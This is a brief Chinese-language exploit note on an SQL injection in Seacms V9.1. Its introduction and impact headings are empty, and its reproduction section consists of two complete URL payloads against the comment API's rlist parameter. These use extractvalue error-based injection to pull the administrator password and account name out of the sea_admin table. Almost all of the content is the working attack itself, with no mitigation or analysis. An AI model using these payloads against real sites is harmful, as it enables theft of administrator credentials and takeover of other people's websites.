# Seacms V9.1 版本SQL注入
### 一、漏洞简介
### 二、漏洞影响
### 三、复现过程
获取管理员表中第一个用户的密码
```
http://url/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`
```
获取管理员表中第一个用户的账号
```
http://url/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(name)from%20sea_admin))),@`%27`
```